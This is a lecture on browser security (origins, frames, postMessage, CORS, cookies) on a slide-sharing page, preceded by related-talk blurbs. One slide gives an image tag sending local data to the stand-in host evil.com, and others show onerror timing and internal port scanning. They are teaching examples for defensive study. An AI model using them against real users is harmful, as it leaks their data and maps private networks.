This document provides an introduction to web security and the browser security model. It discusses goals of web security including safely browsing the web and supporting secure web applications. It outlines common web threat models and covers topics like HTTP, rendering content, isolation using frames and same-origin policy, communication between frames, frame navigation policies, client state using cookies, and clickjacking. The document aims to provide background knowledge on how the web and browsers work from a security perspective.
This talk is a generic but comprehensive overview of security mechanisms, controls and potential attacks in modern browsers. The talk also focuses on new technologies, such as HTML5 and related APIs, to highlight new attack scenarios against browsers.
Web development involves creating websites for the Internet. Web pages can be static, with fixed content, or dynamic, where content can change on the client side. HTML5 is the latest version of HTML and introduces new markup elements, input types, and form attributes. It also supports audio and video elements. CSS3 adds new selectors, properties and values for styling and layout. PHP is a server-side scripting language commonly used for web development. Popular PHP frameworks like Yii, CodeIgniter and Zend help support the development of dynamic websites and applications.
Many notable and new web hacking techniques, discoveries and compromises were uncovered in 2008. This session covers the top 10 vulnerabilities present in 2008, as well as some of the prevalent security issues emerging in 2009. Attendees will virtually be able to walk through the vulnerabilities appearing on today's corporate websites, learning real-world solutions to today's web application security issues.
Moderator: Mike Stephenson, SC lab manager, SC Magazine
- Jeremiah Grossman, founder and chief technology officer, WhiteHat Security
Silverlight is a Microsoft technology that allows for the development of rich internet applications. It uses XAML and .NET to build interfaces in a declarative manner. Silverlight applications can access web services and media, use data binding, and integrate with HTML and JavaScript. The presentation focused on the core features of Silverlight including controls, data binding, advanced media capabilities, and cross-browser deployment options.
Web 2.0 applications involve increased security risks due to their use of asynchronous JavaScript and XML (AJAX) to dynamically update pages. Key security considerations for Web 2.0 include access control, integrity, availability, and privacy/confidentiality. Developers must validate all user-supplied data to prevent attacks like cross-site scripting, enforce access controls, and use encryption to protect private data transmitted in queries.
Dom Hacking & Security - BlackHat Preso - Shreeraj Shah
The document discusses vulnerabilities in web applications that make extensive use of DOM manipulation. It notes that DOM manipulation through JavaScript calls can allow attackers to exploit cross-site scripting (XSS) vulnerabilities. It also discusses how DOM hacking could enable attacks like cross-domain bypassing, stealing sensitive variables, injecting malicious code, and spreading worms. The author aims to cover vulnerabilities in AJAX applications and techniques for detecting DOM-based XSS through scanning and tools. Mitigation strategies are also discussed.
This document discusses the top 10 web hacking techniques of 2012. It provides an overview of each technique including CRIME, attacking memcached via SSRF, Chrome addon hacking, bruteforcing PHPSESSID, blended threats using JavaScript, cross-site port attacks, permanently backdooring HTML5 client-side applications using local storage, CAPTCHA re-riding attacks, gaining access to HttpOnly cookies in 2012 through Java applets, and attacking OData through HTTP verb tunneling and navigation properties. The document also discusses the history of past web hacking techniques and provides background information on topics like HttpOnly cookies, XST, and CAPTCHAs.
Top 10 Web Hacks
Every year the number and creativity of Web hacks increases, and the damage from these attacks rises exponentially, costing organizations millions every year.
Join this webinar to learn about the latest and most insidious Web-based attacks. The much anticipated list, now in its seventh year, represents exhaustive research conducted by a panel of experienced security industry professionals. Learn the latest of the worst in Web hacks, and how to protect your organization.
In this session, Chris Wilson will talk about Internet Explorer 8 and its advances in standards compliance and AJAX support. He will also illustrate the new possibilities it offers to website managers.
The document provides an overview of secure web messaging in HTML5. It discusses how traditional methods of communication like JavaScript, AJAX, and frames had limitations due to the same-origin policy. The HTML5 postMessage API allows for secure cross-origin communication between frames by abstracting multiple principals. While more secure than previous techniques, the postMessage API still requires careful configuration of target origins, validation of received data, and mitigation of framing attacks to prevent security issues like cross-site scripting.
Thug is a new low-interaction honeyclient for analyzing malicious web content and browser exploitation. It uses the Google V8 JavaScript engine and emulates different browser personalities to detect exploits. Thug analyzes content using static and dynamic analysis and logs results using MAEC format. Future work includes improving DOM emulation and JavaScript analysis to better identify vulnerabilities and exploit kits. The source code for Thug will be publicly released after the presentation.
Building Social Enterprise with Ruby and Salesforce - Raymond Gao
This was my presentation at the Oct 4th Dallas Ruby Brigade night. It covers Lean Methodology and using DatabaseDotCom and Ruby.
Source Code
https://github.com/raygao/DallasRubyPresentation
The document provides an overview of key technical aspects of web design, including server-side technologies, client-side technologies like JavaScript and CSS, content management systems, and Web 2.0 features like social networking and Ajax. It discusses topics like browser market share, HTML, HTTP, popular web servers, programming languages, the document object model, CSS techniques, open-source CMS options, characteristics of Web 2.0 sites, the growth of social networking, Ajax goals and examples of its use, and popular Ajax frameworks.
Ethical hacking Chapter 10 - Exploiting Web Servers - Eric Vanderburg
This document discusses exploiting vulnerabilities in web servers. It describes common components of web applications like forms, CGI, ASP, and scripting languages. It also outlines vulnerabilities like SQL injection, cross-site scripting, and improper authentication. Tools for assessing these vulnerabilities are presented, including cgiscan, wfetch, and the OWASP WebGoat project for learning about attacking web applications. The importance of understanding the platform and technologies used to develop a web application is emphasized to determine the appropriate security tests.
This document discusses browser security challenges posed by new technologies like HTML5, cross-document messaging, and browser plugins. It summarizes potential attacks like cross-site scripting through relaxed origin policies, browser SQL injection using HTML5 client storage, and using cross-document messaging to enable cross-site communication. The document advocates for the OWASP Intrinsic Group to work with browser vendors to address these issues.
21. Application Development and Administration in DBMS - koolkampus
The document provides an overview of web interfaces to databases and techniques for improving web application performance. It discusses how databases can be interfaced with the web to allow users to access data from anywhere. It then covers topics like dynamic page generation, sessions, cookies, servlets, server-side scripting, and techniques for improving web server performance like caching. The document also discusses performance tuning at the hardware, database, and transaction levels to identify and address bottlenecks.
This document summarizes Mario Heiderich's presentation titled "Locking the Throne Room - How ES5+ will change XSS and Client Side Security" given at BlueHat, Redmond 2011. The presentation discusses how new features in ECMAScript 5 (ES5), such as Object.defineProperty(), can be used to prevent cross-site scripting (XSS) attacks by locking down access to sensitive DOM properties and methods on the client-side in a tamper-resistant way. This moves XSS mitigation closer to the client where the attacks occur, avoiding issues caused by impedance mismatches between server-side filters and client-side execution. The approach could allow role-based access control and intrusion
This document provides instructions for customizing Dreamweaver to produce XHTML compliant web pages and creating a basic web page. It describes how to set preferences in Dreamweaver to enable auto tag completion, format code as XHTML, and validate pages as XHTML 1.0 Transitional. Instructions are given for opening a new XHTML document and adding sample content and a title. The document aims to enable the creation of a simple but well-designed website using Dreamweaver and XHTML.
1. Cross-site scripting (XSS) allows a malicious script placed on one site to run in a user's browser when they visit another trusted site. This can steal sensitive data like cookies or account credentials.
2. SQL injection occurs when user-supplied input is incorrectly inserted into an SQL query, allowing an attacker to manipulate the query for malicious purposes like accessing unauthorized data.
3. Cross-site request forgery (CSRF) tricks a user's browser into making requests to a trusted site where the user is currently authenticated. This can perform actions like changing account settings without the user's knowledge or consent if the browser sends stored authentication cookies.
The document discusses various security issues that can occur on web portals, including cross-site scripting (XSS) vulnerabilities that allow altering of content or stealing cookies, and cross-site request forgery (CSRF) attacks. It provides examples of how these attacks can be carried out, such as using XSS to change website branding or send a user's cookies to an attacker. The document recommends mitigation techniques like input filtering, consistency checks, and tying sessions to IP addresses to help prevent these types of attacks.
Application and Website Security -- Fundamental Edition - Daniel Owens
The document provides an agenda for a course on application and website security. The agenda covers common input validation flaws like SQL injection and cross-site scripting, access control flaws like session hijacking, encryption flaws, security tools, and concludes with additional resources for further information. The document uses examples to demonstrate various security vulnerabilities and how they can be exploited.
The document discusses various web application security vulnerabilities such as hidden field manipulation, parameter tampering, cross-site scripting, and SQL injection. It provides examples of how attackers can exploit these vulnerabilities and recommendations for developers on how to prevent attacks, including sanitizing user input, encrypting cookies, and validating parameters.
Web Application Security: The Land that Information Security Forgot - Jeremiah Grossman
Today, the vast majority of those within information security have heard about web application security and possess at least a vague understanding of the risks involved. However, the multitude of attacks which make this area of security important, for the most part, go undocumented, unexplained and misunderstood. As a result, our web applications become undefended and at the mercy of a determined attacker. In order to gain a deeper understanding of the threats, witnessing these attacks first hand is essential.
Make no mistake, insecure and unprotected web applications are the fastest, easiest, and arguably the most utilized route to compromise networks and exploit users. What's worse is that conventional security measures lack the proper safeguards and offer little protection, resulting in nothing more than a "false sense of security".
This discussion will cover theory surrounding some of the more dangerous web application attacks, examples of the attack in action, and possible countermeasures.
Jeremiah Grossman is the founder and chairman of WhiteHat Security and a former information security officer at Yahoo!, where he designed, audited and penetration-tested the company's web applications, which demand the highest security.
During his past 5 years of employment, Jeremiah has been researching and applying information security with special emphasis on preventing web application sabotage. Grossman has presented "Web Application Security" talks at many security conventions, such as Defcon, the Air Force and Technology Conference, ToorCon and others.
Jeremiah is a lead contributor to the "Open Web Application Security Project" www.owasp.com and considered to be among the foremost web security experts.
Owasp Top 10 - Owasp Pune Chapter - January 2008 - abhijitapatil
The document discusses various cybersecurity topics including vulnerabilities, threats, attacks, and countermeasures. It provides an overview of the Open Web Application Security Project (OWASP) which focuses on improving application security. It also summarizes common web vulnerabilities like cross-site scripting (XSS), SQL injection, buffer overflows, and cross-site request forgery (CSRF). Recommendations are given to prevent these vulnerabilities.
The document provides an introduction to basic web architecture, including HTML, URIs, HTTP, cookies, database-driven websites, AJAX, web services, XML, and JSON. It discusses how the web is a two-tiered architecture with a web browser displaying information from a web server. Key components like HTTP requests and responses are outlined. Extension of web architecture with server-side processing using languages like PHP and client-side processing with JavaScript are also summarized.
This document discusses client-side controls for restricting user input in web applications. It describes how client-side controls like HTML forms, JavaScript validation, Java applets, and ActiveX controls can validate user input. However, all client-side controls are vulnerable because they run on untrusted clients and can be bypassed. The document recommends validating all user input on the server-side and not trusting any client-side validation. It also discusses techniques attackers use like decompiling bytecode and monitoring processes to bypass client-side controls.
Climate Impact of Software Testing at Nordic Testing Days - Kari Kakkonen
My slides at Nordic Testing Days 6.6.2024
Climate impact / sustainability of software testing is discussed in the talk. ICT and testing must carry their part of global responsibility to help with climate warming. We can minimize the carbon footprint, but we can also have a carbon handprint, a positive impact on the climate. Quality characteristics can be extended with sustainability and then measured continuously. Test environments can be used less, at a smaller scale and on demand. Test techniques can be used to optimize or minimize the number of tests. Test automation can be used to speed up testing.
Threats to mobile devices are more prevalent and increasing in scope and complexity. Users of mobile devices desire to take full advantage of the features available on those devices, but many of the features provide convenience and capability while sacrificing security. This best practices guide outlines steps users can take to better protect personal devices and information.
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0! - SOFTTECHHUB
As the digital landscape continually evolves, operating systems play a critical role in shaping user experiences and productivity. The launch of Nitrux Linux 3.5.0 marks a significant milestone, offering a robust alternative to traditional systems such as Windows 11. This article delves into the essence of Nitrux Linux 3.5.0, exploring its unique features, advantages, and how it stands as a compelling choice for both casual users and tech enthusiasts.
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slackshyamraj55
Discover the seamless integration of RPA (Robotic Process Automation), COMPOSER, and APM with AWS IDP enhanced with Slack notifications. Explore how these technologies converge to streamline workflows, optimize performance, and ensure secure access, all while leveraging the power of AWS IDP and real-time communication via Slack notifications.
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc
How does your privacy program stack up against your peers? What challenges are privacy teams tackling and prioritizing in 2024?
In the fifth annual Global Privacy Benchmarks Survey, we asked over 1,800 global privacy professionals and business executives to share their perspectives on the current state of privacy inside and outside of their organizations. This year’s report focused on emerging areas of importance for privacy and compliance professionals, including considerations and implications of Artificial Intelligence (AI) technologies, building brand trust, and different approaches for achieving higher privacy competence scores.
See how organizational priorities and strategic approaches to data security and privacy are evolving around the globe.
This webinar will review:
- The top 10 privacy insights from the fifth annual Global Privacy Benchmarks Survey
- The top challenges for privacy leaders, practitioners, and organizations in 2024
- Key themes to consider in developing and maintaining your privacy program
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024Neo4j
Neha Bajwa, Vice President of Product Marketing, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfMalak Abu Hammad
Discover how MongoDB Atlas and vector search technology can revolutionize your application's search capabilities. This comprehensive presentation covers:
* What is Vector Search?
* Importance and benefits of vector search
* Practical use cases across various industries
* Step-by-step implementation guide
* Live demos with code snippets
* Enhancing LLM capabilities with vector search
* Best practices and optimization strategies
Perfect for developers, AI enthusiasts, and tech leaders. Learn how to leverage MongoDB Atlas to deliver highly relevant, context-aware search results, transforming your data retrieval process. Stay ahead in tech innovation and maximize the potential of your applications.
#MongoDB #VectorSearch #AI #SemanticSearch #TechInnovation #DataScience #LLM #MachineLearning #SearchTechnology
“An Outlook of the Ongoing and Future Relationship between Blockchain Technologies and Process-aware Information Systems.” Invited talk at the joint workshop on Blockchain for Information Systems (BC4IS) and Blockchain for Trusted Data Sharing (B4TDS), co-located with with the 36th International Conference on Advanced Information Systems Engineering (CAiSE), 3 June 2024, Limassol, Cyprus.
AI 101: An Introduction to the Basics and Impact of Artificial IntelligenceIndexBug
Imagine a world where machines not only perform tasks but also learn, adapt, and make decisions. This is the promise of Artificial Intelligence (AI), a technology that's not just enhancing our lives but revolutionizing entire industries.
Maruthi Prithivirajan, Head of ASEAN & IN Solution Architecture, Neo4j
Get an inside look at the latest Neo4j innovations that enable relationship-driven intelligence at scale. Learn more about the newest cloud integrations and product enhancements that make Neo4j an essential choice for developers building apps with interconnected data and generative AI.
GraphRAG for Life Science to increase LLM accuracyTomaz Bratanic
GraphRAG for life science domain, where you retriever information from biomedical knowledge graphs using LLMs to increase the accuracy and performance of generated answers
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...SOFTTECHHUB
The choice of an operating system plays a pivotal role in shaping our computing experience. For decades, Microsoft's Windows has dominated the market, offering a familiar and widely adopted platform for personal and professional use. However, as technological advancements continue to push the boundaries of innovation, alternative operating systems have emerged, challenging the status quo and offering users a fresh perspective on computing.
One such alternative that has garnered significant attention and acclaim is Nitrux Linux 3.5.0, a sleek, powerful, and user-friendly Linux distribution that promises to redefine the way we interact with our devices. With its focus on performance, security, and customization, Nitrux Linux presents a compelling case for those seeking to break free from the constraints of proprietary software and embrace the freedom and flexibility of open-source computing.
6. Web vs System vulnerabilities
Decline in % web vulnerabilities since 2009
§ 49% in 2010 -> 37% in 2011.
§ Big decline in SQL Injection vulnerabilities
XSS peak
7. Web application vulnerabilities
Web application vulnerabilities as a percentage of all disclosures (pie charts on the slide):
§ 2010: web applications 49%, others 51%
§ 2011 H1: web applications 37%, others 63%
9. Web Security Challenge
How can honest users safely interact with well-intentioned sites, while still freely browsing the web (search, shopping, etc.)?
(Diagram on the slide: the user's browser talks over the network to a "good server" and to a "bad server"; the browser has to decide, e.g., whether to enter a password. A server can also operate as a client to other servers.)
10. Goals of web security
Safely browse the web
§ Users should be able to visit a variety of web sites, without incurring harm:
› No stolen information (without user’s permission)
› Site A cannot compromise session at Site B
Support secure web applications
§ Applications delivered over the web should have the same security properties we require for stand-alone applications
§ And, since many mobile apps are interfaces to web sites: support security for mobile apps
11. Web Threat Models
Web attacker
§ Controls attacker.com
§ Can obtain a valid SSL/TLS certificate for attacker.com (so HTTPS alone does not tell the two apart)
§ User visits attacker.com
› Or: runs the attacker's Facebook app
Network attacker
§ Passive: wireless eavesdropper
§ Active: evil router, DNS poisoning
Malware attacker
§ Attacker escapes the browser's isolation mechanisms and runs separately, under control of the OS
14. Uniform Resource Locator (URL)
Global identifier of network-retrievable content
Example: http://stanford.edu:81/class?name=cs155#homework
§ Protocol: http
§ Hostname: stanford.edu
§ Port: 81
§ Path: /class
§ Query: name=cs155
§ Fragment: homework
Special characters are percent-encoded as hex:
§ %0A = newline
§ %20 or + = space, %2B = + (special exception: + stands for space only in query strings, so a literal + must be encoded)
15. HTTP Request
GET /index.html HTTP/1.1
Accept: image/gif, image/x-bitmap, image/jpeg, */*
Accept-Language: en
Connection: Keep-Alive
User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)
Host: www.example.com
Referer: http://www.google.com?q=dingbats

Request line: method (GET), file (/index.html), HTTP version; then headers; then a blank line; then data (none for a GET)
GET: should have no side effect (safe to repeat). POST: possible side effect.
16. HTTP Response
HTTP/1.0 200 OK
Date: Sun, 21 Apr 1996 02:20:42 GMT
Server: Microsoft-Internet-Information-Server/5.0
Connection: keep-alive
Content-Type: text/html
Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT
Set-Cookie: …
Content-Length: 2543

<HTML> Some data... blah, blah, blah </HTML>

Status line: HTTP version, status code, reason phrase; then headers (including Set-Cookie, which stores state in the browser); then a blank line; then data
19. Browser execution model
Each browser window or frame
§ Loads content
§ Renders it
› Processes HTML and scripts to display page
› May involve images, subframes, etc.
§ Responds to events
Events can be
§ User actions: OnClick, OnMouseover
§ Rendering: OnLoad, OnBeforeUnload
§ Timing: setTimeout(), clearTimeout()
20. Example: a real page (washingtonpost.com, August 2013)
<head>
<title>Washington Post: Breaking News, World, US, DC News .. Analysis</title>
...
</head>
<body class="eidos homepage sectionfront">
<script type="text/javascript">
if(self!==top&&!(top.window.location.pathname).startsWith('/PortalEditor')){top.location=self.location;}
</script>
...
<h2 class="headline"><a href="/world/national-security/nsa-gathered-thousands-of-americans-e-mails-before-court-struck-down-program/2013/08/21/146ba4b6-0a90-11e3-b87c-476db8ac34cd_story.html">Secret court: <br>NSA gathered thousands of domestic e-mails</a>
...
<p class="byline">Ellen Nakashima …</p>
<p class="">The program unlawfully gathered as many as tens of thousands of e-mails, according to a 2011 opinion.</p>
...
<div class="hide"><img class="" src="http://ad.doubleclick.net/ad/N4359.washingtonpost.com/B7241351.19;sz=1x1;ord=[timestamp]?" width="1" height="1" border="0" style="display: inline-block; "></div>
...
Share this video:
...
<a class="facebook_static" onclick="TWP.Module.SocialButtons.staticSocialPopup('http://www.facebook.com/sharer.php?u=http://www.washingtonpost.com/posttv/video/thefold/tonight-on-the-fold-august-21-2013/2013/08/21/36ed282c-0a98-11e3-9941-6711ed662e71_video.html%3Ffb_ref%3Dsm_btn_fb')">
...
Note the frame-busting script at the top of <body> (it navigates the top window to itself if the page finds itself framed) and the hidden 1x1 image that reports the visit to a third-party ad server.
21. Document Object Model (DOM)
Object-oriented interface used to read and write docs
§ web page in HTML is structured data
§ DOM provides representation of this hierarchy
Examples
§ Properties: document.alinkColor, document.URL,
document.forms[ ], document.links[ ], document.anchors[ ]
§ Methods: document.write(document.referrer)
Includes Browser Object Model (BOM)
§ window, document, frames[], history, location, navigator (type
and version of browser)
22. Changing HTML using Script, DOM
Some possibilities
§ createElement(elementName)
§ createTextNode(text)
§ appendChild(newChild)
§ removeChild(node)
Example: add a new list item to this HTML:
<ul id="t1">
<li> Item 1 </li>
</ul>
var text = 'Item 2';                          // the text to add
var list = document.getElementById('t1');
var newitem = document.createElement('li');
var newtext = document.createTextNode(text);  // a text node: `text` is not parsed as HTML
list.appendChild(newitem);
newitem.appendChild(newtext);
23. HTML Image Tags
Basic web functionality: displays this nice picture →
<html>
…
<p> … </p>
…
<img src="http://example.com/sunset.gif" height="50" width="100">
…
</html>
Security issues?
24. Image tag security issues
Communicate with other sites
§ <img src="http://evil.com/pass-local-information.jpg?extra_information">
Hide the resulting image
§ <img src="…" height="1" width="1">
Spoof other sites
§ Add logos that fool a user
Important point: a web page can send information to any site (the image request, with whatever is in its URL, goes out with no user involvement)
Security consequences follow on the next slides
25. JavaScript onError
Basic function
§ Triggered when an error occurs loading a document or an image
Example
§ Runs the onError handler if the image does not exist and cannot load
<img src="image.gif" onerror="alert('The image could not be loaded.')">
http://www.w3schools.com/jsref/jsref_onError.asp
Basic web functionality
26. JavaScript timing
Sample code: the browser fetches the URL as an image; when the response header shows the resource is not an image, it stops and notifies JavaScript via the onerror handler. The page never sees the cross-origin content, but it learns whether, and how quickly, the host answered.
<html><body><img id="test" style="display: none">
<script>
var test = document.getElementById('test');
var start = new Date();
test.onerror = function() {
var end = new Date();
alert("Total time: " + (end - start));
}
test.src = "http://www.example.com/page.html";
</script>
</body></html>
Basic web functionality
27. Port scanning behind firewall
JavaScript can:
§ Request images from internal IP addresses
› Example: <img src="http://192.168.0.4:8080/"/>
§ Use timeout/onError to determine success/failure (a closed port fails fast, an open one answers or hangs)
§ Fingerprint web apps using known image names
(Diagram on the slide: 1) the user asks a malicious web page to "show me dancing pigs!"; 2) the page says "check this out" and the browser, which sits behind the firewall, scans the internal servers; 3) the port scan results go back to the attacker.)
Basic web functionality
28. Remote scripting
Goal
§ Exchange data between a client-side app running in a browser and a server-side app, without reloading the page
Methods
§ Java applet / ActiveX control / Flash
› Can make HTTP requests and interact with client-side JavaScript code, but requires LiveConnect (not available on all browsers); all three are obsolete today, XMLHttpRequest/fetch took their place
§ XML-RPC
› Open, standards-based technology that requires XML-RPC libraries on the server and in your client-side code
§ Simple HTTP via a hidden IFRAME
› An IFRAME loading a script on your web server (or a database of static HTML files) is by far the easiest of the three remote scripting options
See: http://developer.apple.com/internet/webcontent/iframe.html
Important point: a web site can maintain bi-directional communication with the browser (until the user closes/quits the page)
29. Simple remote scripting example
client.html:
<script type="text/javascript">
function handleResponse() {
alert('this function is called from server.html') }
</script>
<iframe id="RSIFrame" name="RSIFrame"
style="width:0px; height:0px; border: 0px"
src="blank.html">
</iframe>
<a href="server.html" target="RSIFrame">make RPC call</a>

server.html (another page on the same server; could be server.php, etc.), loaded into the hidden iframe, calls back into the parent:
<script type="text/javascript">
window.parent.handleResponse()
</script>

client.html makes the RPC by passing arguments to server.html in the query string. The same RPC can be done silently in JavaScript (by setting the iframe's src), passing and receiving arguments.
31. Frame and iFrame
Window may contain frames from different sources
§ Frame: rigid division as part of a frameset
§ iFrame: floating inline frame
iFrame example:
<iframe src="hello.html" width=450 height=100>
If you can see this, your browser doesn't understand IFRAME.
</iframe>
Why use frames?
§ Delegate screen area to content from another source
§ Browser provides isolation based on frames
§ Parent may work even if frame is broken
33. Analogy
                  Operating system                        Web browser
Primitives        system calls, processes, disk           Document Object Model, frames, cookies / localStorage
Principals        users (discretionary access control)    "origins" (mandatory access control)
Vulnerabilities   buffer overflow, root exploit           cross-site scripting, cross-site request forgery, cache history attacks, …
34. Browser security mechanism
Each frame of a page has an origin
§ Origin = protocol://host:port (the path is not part of the origin)
Frame can access its own origin
§ Network access, read/write DOM, storage (localStorage; cookies are the exception, scoped by domain and path, see slide 59)
Frame cannot access data associated with a different origin
(Diagram on the slide: frames from origin A and origin B nested in one page; the A frames can script each other, neither can script B.)
35. Components of browser security policy
Frame-Frame relationships
§ canScript(A,B)
› Can Frame A execute a script that manipulates arbitrary/nontrivial DOM elements of Frame B?
§ canNavigate(A,B)
› Can Frame A change the origin of content for Frame B?
Frame-principal relationships
§ readCookie(A,S), writeCookie(A,S)
› Can Frame A read/write cookies from site S?
36. Library import excluded from SOP
<script src="https://seal.verisign.com/getseal?host_name=a.com"></script>
• The script runs with the privileges of the importing page, NOT of the server it came from.
• It can script other pages in this origin and load more scripts.
• Same issues with other forms of importing (e.g., stylesheets).
• Practitioner caveat: the importing page can pin the expected script with Subresource Integrity (integrity="sha256-…" on the tag), so a script that has changed on the remote server is refused.
39. HTML5 Frame sandbox
Specify the sandbox attribute of an iframe:
<iframe sandbox src="http://untrusted.site.net/content"></iframe>
Creates a restricted frame:
§ Plugins are disabled: ActiveX, Flash or Silverlight content will not execute.
§ Forms are disabled: the framed content cannot submit forms to any target.
§ Scripts are disabled: JavaScript will not execute.
§ Navigation of other browsing contexts is disabled: a link targeting the top window or another frame will not navigate it.
§ Unique origin: the content is treated as coming from a unique (opaque) origin, so it cannot reach the DOM of other frames or read cookies.
40. Optional attributes relax sandbox
allow-forms
§ Allows the embedded page to post back using a form submit within the frame.
allow-scripts
§ Enables JavaScript
allow-same-origin
§ Keeps the content's real origin, so it can access the DOM of other frames, subject to the same-origin policy
§ Only useful together with allow-scripts
§ But be careful: if the framed document is same-origin with the embedding page, allow-scripts plus allow-same-origin lets it reach the parent's DOM and strip its own sandbox attribute, removing all restrictions.
allow-top-navigation
§ Allow content to navigate the entire tab/window
allow-popups
§ Allow embedded content to open new popup windows
49. Fragment Identifier Messaging
Send information by navigating a frame
§ http://gadget.com/#hello
Navigating to a fragment doesn't reload the frame
§ No network traffic, but the frame can read its fragment
Not a secure channel
§ Confidentiality ✓: the fragment never leaves the browser and only the frame itself reads its own location
§ Integrity ✗: any frame able to navigate the target can overwrite the fragment before it is read
§ Authentication ✗: the receiver cannot tell which frame set the fragment
50. window.postMessage
API for inter-frame communication
§ Supported in current browsers
§ A network-like channel between frames
(Diagram on the slide: a gadget frame "Add a contact" messaging a "Share contacts" frame.)
51. postMessage syntax
Receiver (in b.com's frame): check the browser-supplied origin before trusting e.data:
window.addEventListener("message", function (e) {
if (e.origin == "http://a.com") {
... e.data ... }
}, false);
Sender (in a.com's frame): the second argument restricts delivery to a frame currently at that origin:
frames[0].postMessage("Attack at dawn!", "http://b.com/");
(Slide illustration: a Facebook anecdote.)
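The origin definition of slide 34 and the postMessage origin check of slide 51, as an added example (not code from the lecture slides). It runs under Node with no DOM: the "event" objects and "frames" below are constructed stand-ins for what a browser delivers, and the hostnames a.com, b.com and evil.com are the slides' own examples plus an assumed attacker host.

```javascript
// Added example, not code from the lecture slides: how a browser derives an
// origin from a URL (slide 34) and how a postMessage receiver should check
// e.origin (slide 51). Runs under Node with no DOM; the "event" objects and
// "frames" below are constructed stand-ins for what a browser delivers.

// Origin = scheme://host[:port]; the default port for the scheme is dropped and
// path, query and fragment are ignored. (Non-special schemes give "null".)
function originOf(url) {
  return new URL(url).origin;
}

function sameOrigin(urlA, urlB) {
  return originOf(urlA) === originOf(urlB);
}

// Receiver: trust the message only if the browser-supplied e.origin is exactly
// the expected origin. Returns the accepted message, or null if rejected.
function makeReceiver(trustedOrigin) {
  return function onMessage(e) {
    if (e.origin !== trustedOrigin) return null;
    return { from: e.origin, data: e.data };
  };
}

// The common mistake, kept for comparison: a prefix (or substring / regexp)
// test on e.origin, which a host the attacker controls can satisfy.
function makeSloppyReceiver(trustedOrigin) {
  return function onMessage(e) {
    if (!e.origin.startsWith(trustedOrigin)) return null;
    return { from: e.origin, data: e.data };
  };
}

// Sender side, as the browser behaves: postMessage(data, targetOrigin) is
// delivered only if the target frame is *currently* at targetOrigin ("*"
// disables the check). A frame is modelled as { location, onmessage }.
function deliver(senderOrigin, targetFrame, data, targetOrigin) {
  if (targetOrigin !== '*' && originOf(targetOrigin) !== originOf(targetFrame.location)) {
    return { delivered: false, result: null }; // frame was navigated elsewhere: message dropped
  }
  return { delivered: true, result: targetFrame.onmessage({ origin: senderOrigin, data }) };
}
```

`makeReceiver('http://a.com')` accepts a message whose origin is exactly `http://a.com` and rejects one from `http://a.com.evil.com`; the prefix-checking variant accepts the latter, which is why origin checks must be exact string comparisons. On the sending side, `deliver` drops the message when the target frame has been navigated away from `http://b.com`, the reason to pass a real targetOrigin rather than `"*"`.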
53. Two-way communication
A method call is associated with a response
Can build this on top of postMessage
§ Messenger: Each time you call a method in the iframe, you pass a reply function that is
called with the results of that method call.
54. jQuery postMessage plugin
Wraps the postMessage API and simplifies its usage.
Works in browsers that do not support postMessage method by using fragment
navigation (hash portion of the url)
55. Network communication
Cross-origin network requests (CORS): site B's response must opt in before script running in site A's context may read it
Access-Control-Allow-Origin: https://a.com    (a single origin per response, chosen for the requester; the header does not take a list)
Access-Control-Allow-Origin: *                (any origin, but then the response cannot be read with credentials)
(Diagram on the slide: a request from the site A context to site B, answered with the header above.)
57. Cookies
Used to store state on the user's machine; HTTP is a stateless protocol, cookies add state
Server → browser (in a response, e.g. to POST …), HTTP header:
Set-Cookie: NAME=VALUE; domain=(who can read); expires=(when it expires); secure (only over HTTPS)
Browser → server (on later requests, e.g. GET …), HTTP header:
Cookie: NAME=VALUE
If expires is not set: the cookie lives for this browser session only
58. Cookie authentication
Browser → web server: POST login.cgi with username & password
Web server → auth server: validate user; auth server replies auth=val, web server stores val
Web server → browser: Set-Cookie: auth=val
Browser → web server: GET restricted.html with Cookie: auth=val
Web server → auth server: check val; auth server replies YES/NO
If YES, web server returns restricted.html
59. Cookie Security Policy
Uses:
§ User authentication
§ Personalization
§ User tracking: e.g. Doubleclick (3rd-party cookies)
Cookie scope is the tuple <domain, path>, not the same-origin policy's origin (scheme and port are ignored, apart from the Secure flag)
§ A site can set cookies valid across a domain suffix (e.g. bank.com, then sent to all of its subdomains)
§ Complicated and implementation-specific rules for selecting cookie values when many cookies apply
60. Secure Cookies
Server → browser, HTTP header:
Set-Cookie: NAME=VALUE; Secure
• Provides confidentiality against a network attacker
• Browser will only send the cookie back over HTTPS
• … but no integrity
• A response served over plain HTTP could set a cookie with the same name, domain and path
⇒ a network attacker can rewrite secure cookies
⇒ and so log the user into the attacker's account
(Current browsers close most of this hole: a non-HTTPS response may no longer overwrite or shadow an existing Secure cookie, and a cookie named with the __Host- prefix is only accepted over HTTPS, with Secure set and no Domain attribute.)
61. httpOnly Cookies
Server → browser, HTTP header:
Set-Cookie: NAME=VALUE; HttpOnly
• Cookie is sent over HTTP(S) as usual, but is not accessible to scripts
• Cannot be read via document.cookie
• Helps prevent cookie theft via XSS
… but does not stop most other risks of XSS bugs (the injected script can still issue requests that carry the cookie)
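The cookie rules of slides 57 to 61 (Domain suffix, Path prefix, Secure, HttpOnly, and the Secure-cookie overwrite by a network attacker) as a small cookie jar, an added example and not code from the slides. Hostnames, cookie names and values are made up; expiry is omitted, so every cookie is a session cookie. The `leaveSecureCookiesAlone` switch models the rule current browsers apply (from the RFC 6265bis draft): a response that did not arrive over HTTPS cannot overwrite or shadow an existing Secure cookie. Turn it off to reproduce the classic behaviour the slide describes.

```javascript
// Added example, not code from the lecture slides: a minimal cookie jar that
// applies the scoping rules of slides 57-61. All URLs and cookies are made up.

function defaultPath(url) {
  // RFC 6265 default-path: the request path up to (not including) its last '/'.
  const p = new URL(url).pathname;
  const i = p.lastIndexOf('/');
  return i <= 0 ? '/' : p.slice(0, i);
}

function domainMatches(host, domain) {
  return host === domain || host.endsWith('.' + domain);
}

function pathMatches(reqPath, cookiePath) {
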